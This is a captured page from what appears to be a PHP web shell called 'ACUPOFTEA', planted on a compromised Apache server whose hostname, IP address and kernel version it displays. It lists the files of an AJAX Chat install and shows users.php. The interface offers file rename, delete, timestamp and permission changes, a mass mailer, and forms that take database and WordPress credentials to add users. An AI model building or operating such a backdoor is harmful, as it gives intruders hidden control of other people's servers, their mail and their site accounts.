System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
ajaxchat
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
users.php
<?php /* * @package AJAX_Chat * @author Sebastian Tschan * @copyright (c) Sebastian Tschan * @license Modified MIT License * @link https://blueimp.net/ajax/ */ // List containing the registered chat users: $users = array(); // Default guest user (don't delete this one): $users[0] = array(); $users[0]['userRole'] = AJAX_CHAT_GUEST; $users[0]['userName'] = null; $users[0]['password'] = null; $users[0]['channels'] = array(0); // Sample admin user: $users[1] = array(); $users[1]['userRole'] = AJAX_CHAT_ADMIN; $users[1]['userName'] = '[[admin_username]]'; $users[1]['password'] = '[[admin_pass]]'; $users[1]['channels'] = array(0,1); // Sample moderator user: $users[2] = array(); $users[2]['userRole'] = AJAX_CHAT_MODERATOR; $users[2]['userName'] = 'moderator'; $users[2]['password'] = '[[admin_pass]]'; $users[2]['channels'] = array(0,1); // Sample registered user: $users[3] = array(); $users[3]['userRole'] = AJAX_CHAT_USER; $users[3]['userName'] = 'user'; $users[3]['password'] = '[[admin_pass]]'; $users[3]['channels'] = array(0,1); ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-15 09:39:31
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-10-15 09:39:31
php53
DIR
-
drwxr-xr-x
2025-10-15 09:39:31
php56
DIR
-
drwxr-xr-x
2025-10-15 09:39:31
php71
DIR
-
drwxr-xr-x
2025-10-15 09:39:31
php81
DIR
-
drwxr-xr-x
2025-10-15 09:39:31
php82
DIR
-
drwxr-xr-x
2025-10-15 09:39:31
changelog.txt
text/plain
3.06 KB
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
3.48 KB
-rw-r--r--
2025-10-14 08:02:36
config.php
text/x-php
9.74 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
3.58 KB
-rw-r--r--
2025-10-14 08:02:36
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
107 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
2.54 KB
-rw-r--r--
2025-10-14 08:02:36
info.xml
text/html
3.76 KB
-rw-r--r--
2025-10-14 08:01:48
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
3.2 KB
-rw-r--r--
2025-10-14 08:02:36
install.xml
text/html
495 B
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
1004 B
-rw-r--r--
2025-10-14 08:02:36
notes.txt
text/plain
187 B
-rw-r--r--
2025-10-14 08:01:48
users.php
text/x-php
1.03 KB
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com